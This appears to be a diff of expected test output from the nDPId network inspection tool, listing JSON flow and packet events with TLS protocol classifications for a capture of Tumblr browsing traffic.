-00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292120654,"flow_last_seen":1605292120839,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::200e","src_port":58004,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292118602,"flow_last_seen":1605292118777,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d582","src_port":50906,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00612{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292118602,"flow_last_seen":1605292118777,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d582","src_port":50906,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00719{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":862,"flow_first_seen":1605292103810,"flow_last_seen":1605292122755,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2294,"flow_tot_l4_payload_len":522833,"flow_avg_l4_payload_len":606,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::98c7:1593","src_port":42908,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by 
port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605292103804,"flow_last_seen":1605292104007,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":644,"flow_tot_l4_payload_len":1288,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::8fcc:d927","src_port":57286,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605292103804,"flow_last_seen":1605292104007,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":644,"flow_tot_l4_payload_len":1288,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::8fcc:d927","src_port":57286,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1605292105197,"flow_last_seen":1605292105378,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":19710,"flow_avg_l4_payload_len":394,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58380,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1605292105274,"flow_last_seen":1605292105347,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58382,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2002","src_port":35892,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2002","src_port":35892,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":44164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":44164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1605292105418,"flow_last_seen":1605292122864,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1279,"flow_tot_l4_payload_len":9163,"flow_avg_l4_payload_len":261,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39152,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"}} -00715{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1605292122674,"flow_last_seen":1605292122861,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":3283,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"}} -00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::200e","src_port":58614,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::200e","src_port":58614,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::200e","src_port":58616,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by 
port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::200e","src_port":58616,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::200e","src_port":58618,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::200e","src_port":58618,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292122874,"flow_last_seen":1605292122899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40190,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292122874,"flow_last_seen":1605292122899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40190,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1605292121486,"flow_last_seen":1605292122503,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":24052,"flow_avg_l4_payload_len":387,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a16","src_port":43328,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"}} -00719{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":289,"flow_first_seen":1605292105170,"flow_last_seen":1605292122449,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":187188,"flow_avg_l4_payload_len":647,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43420,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00719{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":326,"flow_first_seen":1605292105171,"flow_last_seen":1605292122739,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":185805,"flow_avg_l4_payload_len":569,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43434,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43602,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00611{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43602,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00675{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":28,"flow_first_seen":1605292105726,"flow_last_seen":1605292122804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":1371,"flow_avg_l4_payload_len":48,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4c03","src_port":51874,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00619{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":28,"flow_first_seen":1605292105726,"flow_last_seen":1605292122804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":1371,"flow_avg_l4_payload_len":48,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4c03","src_port":51874,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":63,"flow_first_seen":1605292122095,"flow_last_seen":1605292122344,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3141,"flow_tot_l4_payload_len":39546,"flow_avg_l4_payload_len":627,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200a","src_port":38608,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} -00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292120654,"flow_last_seen":1605292120853,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":55014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by 
port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292120654,"flow_last_seen":1605292120853,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":55014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292102219,"flow_last_seen":1605292102219,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292102219,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1605292102219,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292102219,"pkt":"qtsDr8lk5EKm5WPyht1gCcfOACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3RABu9uJhiq5D+6LgBAB9a70AAABAQgKqXs\/nsLc288="} +00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292102602,"flow_last_seen":1605292102602,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292102602,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1605292102602,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292102602,"pkt":"qtsDr8lk5EKm5WPyht1gD4BTACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXidvHABuwi2Qd5sejoTgBAk6T9pAAABAQgKJEdEAsLc4vQ="} +00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292102603,"flow_last_seen":1605292102603,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292102603,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1605292102603,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292102603,"pkt":"qtsDr8lk5EKm5WPyht1gCYSFACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3UABuxOPqDR2fQOlgBAB9XmBAAABAQgKqXtBHsLc4vw="} 
+00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1605292102653,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292102653,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdELkP7ovbiYYrgBALf0cxAAABAQgKwt2S76l05rw="} 